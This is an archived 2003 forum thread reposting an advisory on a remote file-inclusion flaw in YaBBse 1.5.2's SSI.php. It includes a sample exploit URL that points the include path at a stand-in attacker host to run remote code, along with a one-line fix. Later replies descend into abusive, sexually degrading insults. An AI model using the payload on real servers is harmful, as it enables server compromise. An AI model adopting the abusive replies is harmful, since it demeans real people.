PDA

View Full Version : Remote code execution in YaBBse 1.5.2 (php version)

CourtneyDS
May 18th, 2003, 11:16 PM
Remote code execution in YaBBse 1.5.2 (php version)

======[ Overview
YaBB is widely used bulletin board system.




======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug in not exploitable if PHP's registar_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com



Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS
Slayer
May 19th, 2003, 01:31 PM
Just out of interest,who the heck is 'eltoro'?
David Lindon
May 19th, 2003, 03:12 PM
Thanks for the warning court.
CourtneyDS
May 19th, 2003, 11:47 PM
rocker_nash
Just out of interest,who the heck is 'eltoro'?

^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and dont concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :
Thanks for the warning court.


^^ Your more then welcome David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped-out in under 12 key strokes ?

Sincerely
CourtneyDS
webcamguy
June 2nd, 2003, 11:59 PM
damn, even i can do it up on yabb and mysql
eyelfixit
June 3rd, 2003, 12:18 AM
Dought it, there's patches out there and this is extremly old info.
webcamguy
June 3rd, 2003, 12:31 AM
whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.
eyelfixit
June 3rd, 2003, 12:35 AM
The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.
webcamguy
June 3rd, 2003, 12:39 AM
Originally posted by eyelfixit
The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.

how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit
eyelfixit
June 3rd, 2003, 12:42 AM
Can you speak english cause I really can't follow your "slang" .

What your saying doesn't make any sense, again!
webcamguy
June 3rd, 2003, 01:04 AM
Originally posted by eyelfixit
Can you speak english cause I really can't follow your "slang" .

What your saying doesn't make any sense, again!

yo, we dont all have spell checkers like you dude. i read some of ur other posts n you cant spell. whats up man, search engine down n you can be important. ah ha ha ha ha
ur a fukin joke bro! go get urself a girl cuz you dont know nothin n it shows!
eyelfixit
June 3rd, 2003, 01:08 AM
Sorry bud, but this is pretty weak again, I do have a beautifull wife and 2 kids.

And as far as I know all top search engines are up.

LOL :)
webcamguy
June 3rd, 2003, 01:13 AM
Originally posted by eyelfixit
Sorry bud, but this is pretty weak again, I do have a beautifull wife and 2 kids.

And as far as I know all top search engines are up.

LOL :)

damb, i hope they aint as dumb n retarded on the computer as you bro! if so man, ur some sad arse peeps up there in bc!
yo man does she give good head!
eyelfixit
June 3rd, 2003, 01:30 AM
lol, god you crack me up, you remind me a someone I know.
webcamguy
June 3rd, 2003, 01:37 AM
Originally posted by eyelfixit
lol, god you crack me up, you remind me a someone I know.

yo man thats good bro, jus tell ur slut arse wife to swallow next time or shes gonna get fuked up! yo man im gonna piss on her like the worthless tramp she is! slut wife and a retarded husband!
eyelfixit
June 3rd, 2003, 02:05 AM
Do you honestly think that a hater can get the best of me?

Try again. :)
Spud
June 21st, 2003, 10:59 PM
Just out of interest,who the hell is 'eltoro'?
(electron)

I think he was one of the 1st known hackers,
and he is also australian,
but i also didn't read much of this thread so i could be off subject ?